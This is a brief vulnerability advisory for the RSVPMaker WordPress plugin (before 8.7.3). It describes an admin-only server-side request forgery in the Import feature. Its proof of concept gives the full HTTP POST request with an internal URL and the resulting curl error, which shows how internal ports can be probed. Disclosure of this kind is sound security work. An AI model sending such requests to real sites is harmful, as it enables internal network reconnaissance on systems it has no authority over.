RSVPMaker < 8.7.3 - Authenticated (admin+) SSRF

The Import feature of the plugin (/wp-admin/tools.php?page=rsvpmaker_export_screen) takes an URL input and calls curl on it, without first validating it to ensure it’s a remote one. As a result, a high privilege user could use that feature to scan the internal network via a SSRF attack.

PoC

Go to the Import feature (wp-admin/tools.php?page=rsvpmaker_export_screen), enter an internal URL and click ‘Import’ POST /wp-json/rsvpmaker/v1/importnow HTTP/1.1 Host: 172.28.128.50 Content-Length: 52 Accept: / X-Requested-With: XMLHttpRequest X-WP-Nonce: b56e26b3f8 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://172.28.128.50 Referer: http://172.28.128.50/wp-admin/tools.php?page=rsvpmaker_export_screen Accept-Language: en-US,en;q=0.9 Cookie: [admin cookies] Connection: close importrsvp=http%3A%2F%2F127.0.0.1%3A23&start;=0 Response: cURL error 7: Failed to connect to 127.0.0.1 port 23: Connection refused